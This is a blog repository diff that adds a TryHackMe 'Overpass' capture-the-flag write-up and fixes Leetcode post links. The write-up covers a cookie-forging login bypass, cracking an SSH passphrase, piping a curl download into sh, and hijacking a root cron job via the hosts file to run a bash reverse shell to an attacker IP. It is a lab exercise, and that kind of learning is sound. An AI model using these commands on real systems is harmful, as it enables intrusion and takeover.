Restructured and Added CTF Writeup

content/en/posts/BinarySearch.md

@@ -139,4 +139,4 @@ mid = (left + right) // 2 # Floor Division
 mid = (left + right) / 2  # Division
 ```
 
-There are 2 posts on this searching algorithms on this site here: [Leetcode Binary Search]({{< ref "posts/Leetcode-BinarySearch704.md" >}}) and [Leetcode First Bad Version 278]( {{< ref "posts/Leetcode-FirstBadVersion278.md" >}} )
+There are 2 posts on this searching algorithms on this site here: [Leetcode Binary Search]({{< ref "posts/leetcode/Leetcode-BinarySearch704.md" >}}) and [Leetcode First Bad Version 278]( {{< ref "posts/leetcode/Leetcode-FirstBadVersion278.md" >}} )

content/en/posts/TryHackMe/2023-12-23-Overpass.md

@@ -0,0 +1,186 @@
+---
+layout: post
+title: TryHackMe - Overpass
+date: '2023-12-23 10:29:32 +0800'
+categories: [CTF, TryHackMe]
+tags: [ctf,tryhackme]
+math: true
+libraries:
+  - mathjax
+math: true
+description: Overpass Room in TryHackMe
+---
+
+# Description
+
+What happens when a group of broke Computer Science students try to make a password manager?
+
+Obviously a perfect commercial success!
+
+# Enumeration
+
+### Nmap Scan
+
+```bash
+nmap -p- -T5 $IP
+```
+
+```text
+Nmap scan report for 10.10.88.227
+Host is up (0.19s latency).
+Not shown: 64807 closed tcp ports (conn-refused), 726 filtered tcp ports (no-response)
+PORT STATE SERVICE
+22/tcp open ssh
+80/tcp open http
+```
+
+### Dirbuster Scan
+
+{{< img src="/images/Overpass/Dirbuster.png" title="Dirbuster Scan" caption="Administrator Page found!" alt="" width="700px" position="center" >}}
+
+Looks like there is a route to `http://10.10.88.227/admin.html`.
+
+Inspecting the sources (`login.js`), we can see the vulnerable code block:
+
+{{< img src="/images/Overpass/Vulnerable_code.png" title="Vulnerable Code Block" caption="Look at the `else` block" alt="" width="700px" position="center" >}}
+
+The `if-else` blocks only checks for "Incorrect Credentials" in the POST response, we could probably modify the response via Burpsuite to force a creation of a `SessionToken` cookie (or manually create 1 ourselves).
+
+# Burpsuite Intercept
+
+{{< img src="/images/Overpass/Burpsuite_Req.png" title="Burpsuite" caption="Modify Burpsuite Response" alt="" width="700px" position="center" >}}
+
+Intercepting the traffic, we can get the `Response to this request` in the ui:
+
+{{< img src="/images/Overpass/Burpsuite_mod_response.png" title="Burpsuite" caption="Response to this request" alt="" width="700px" position="center" >}}
+
+Forwarding the traffic, we can see the modified response
+
+{{< img src="/images/Overpass/Burpsuite_mod_response_recv.png" title="Burpsuite" caption="Modified Request" alt="" width="700px" position="center" >}}
+
+We can then try to refresh the page in Burpsuite's Browser and find that we are logged in!
+
+{{< img src="/images/Overpass/Overpass_Login_landing.png" title="Overpass" caption="Successful Login!" alt="" width="700px" position="center" >}}
+
+We can see that a `SessionToken` cookie is created in the browser
+{{< img src="/images/Overpass/Mod_session_cookie.png" title="Burpsuite" caption="Modified Session Key" alt="" width="700px" position="center" >}}
+
+Looks like an SSH RSA Private Key. We might be able to use this to access the server?
+
+# SSH
+
+Trying this:
+```bash
+ssh -i james@$IP
+```
+
+I get the following response:
+
+{{< img src="/images/Overpass/failed_ssh.png" title="SSH" caption="SSH Requires a passphrase" alt="" width="700px" position="center" >}}
+
+## Cracking the SSH key passphrase
+
+I first used `ssh2john` to convert it to a key hash:
+```bash
+ssh2john james.key > james.key.hash
+```
+
+Removing the `rsa.key:` from the hash, and using hashcat to identify the id of the hash to crack:
+
+{{< img src="/images/Overpass/key_to_hash.png" title="SSH" caption="Hash Generation and Identification" alt="" width="700px" position="center" >}}
+
+I then use `hashcat` to crack the hash with the `rockyou` wordlist:
+
+```bash
+hashcat -m 22931 james.key.hash /usr/share/wordlists/rockyou.txt
+```
+
+{{< img src="/images/Overpass/cracked_key.png" title="SSH" caption="Cracked Key!" alt="" width="700px" position="center" >}}
+
+Passphrase: `james13`
+
+## Login attempt
+Using the same command, I tried to SSH into the machine with the key and passphrase:
+
+{{< img src="/images/Overpass/successful_ssh.png" title="SSH" caption="Successful Login with the passphrase!" alt="" width="700px" position="center" >}}
+
+We got the user flag:
+
+```text
+thm{65c1aaf000506e56996822c6281e6bf7}
+```
+
+# Privilege Escalation
+
+Using Linpeas, we can find possible routes to privilige escalation. Following [this tutorial](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS#quick-start), I started a webserver in the host machine and curl-ed the script in the victim machine:
+
+```bash
+curl $HOST-IP/linpeas.sh | sh
+```
+
+### Crontab
+
+{{< img src="/images/Overpass/linpeas_crontab.png" title="Linpeas" caption="Crontab" alt="" width="700px" position="center" >}}
+
+Looks like the final line in the crontab runs as `root`, getting a bash script from a particular server and executing it
+
+### Hosts File
+
+{{< img src="/images/Overpass/linpeas_host_file.png" title="Linpeas" caption="Host File" alt="" width="700px" position="center" >}}
+
+The hosts file seems to be writable by everyone. Looks like I could modify the `overpass.thm` in the hosts file to do a callback to the host machine to run a malicious callback script.
+
+## Escalation Process
+
+We first created the necessary directories and `buildscript.sh` file:
+
+```bash
+mkdir downloads
+mkdir downloads/src
+vim downloads/src/buildscript.sh
+# Create the file with this as content: 
+# bash -i >& /dev/tcp/HOST-IP/5555 0>&1
+# bash -i >& /dev/tcp/10.17.101.177/5555 0>&1
+
+# Just in case (Probably don't have to do this)
+chmod +x downloads/src/buildscript.sh
+```
+
+and also started 2 servers:
+```bash
+# Start the netcat listener
+nc -lvnup 5555
+
+# Python Http Server
+# sudo python3 -m http.server 80
+
+# Python2 Http Server
+python2 -m SimpleHTTPServer 80
+```
+It doesn't seem like the Python3 server works, so I used python2 with `SimpleHTTPServer` instead.. (More info later)
+
+The script used was a `bash reverse shell`, folloing the tutorial [here](https://ioflood.com/blog/bash-reverse-shell/), I created the file with this as the content:
+
+```text
+#!/bin/bash
+
+bash -i >& /dev/tcp/10.17.101.177/5555 0>&1
+```
+
+In the Victim Machine, I modified the hosts file
+```text
+10.17.101.177 overpass.thm
+```
+
+{{< img src="/images/Overpass/modified_hosts.png" title="Hosts File" caption="Modifed Hosts file in victim machine" alt="" width="700px" position="center" >}}
+
+And then we wait.. The script will be executed after the request from crontab.
+
+{{< img src="/images/Overpass/python_web_server.png" title="Python Web Server" caption="Python3 doesn't seem to work" alt="" width="700px" position="center" >}}
+
+After a few seconds, we get a reverse shell running as root! We can get the root flag from the current directory:
+
+{{< img src="/images/Overpass/root_flag.png" title="Root" caption="Root Flag!" alt="" width="700px" position="center" >}}
+
+We can see that we are root, the `root.txt` flag is in the directory and we can get the root flag!
+

content/en/posts/leetcode/Leetcode-FirstBadVersion278.md

@@ -59,7 +59,7 @@ Explanation: 2 does not exist in nums so return -1
 
 # Process
 
-Using a binary search done in [Leetcode Binary Search 704]( {{< ref "posts/Leetcode-BinarySearch704.md" >}}), I was able to get the first bad version.
+Using a binary search done in [Leetcode Binary Search 704]( {{< ref "posts/leetcode/Leetcode-BinarySearch704.md" >}}), I was able to get the first bad version.
 
 First, I initialised my `left` variable to `1` as the lower limit was `1` and I couldn't start from 0. I initialised right to be `n` for the number of versions.
 
@@ -95,4 +95,4 @@ class Solution:
 
 # Afterthoughts
 
-This is almost a duplicate of [Leetcode Binary Search 704]( {{< ref "posts/Leetcode-BinarySearch704.md" >}}), where binary search is used as the most efficient algorithm, splitting the sorted array into half each time through the iteration to search for the values required. I need more practice to be familiar and comfortable with these searching algorithms.
+This is almost a duplicate of [Leetcode Binary Search 704]( {{< ref "posts/leetcode/Leetcode-BinarySearch704.md" >}}), where binary search is used as the most efficient algorithm, splitting the sorted array into half each time through the iteration to search for the values required. I need more practice to be familiar and comfortable with these searching algorithms.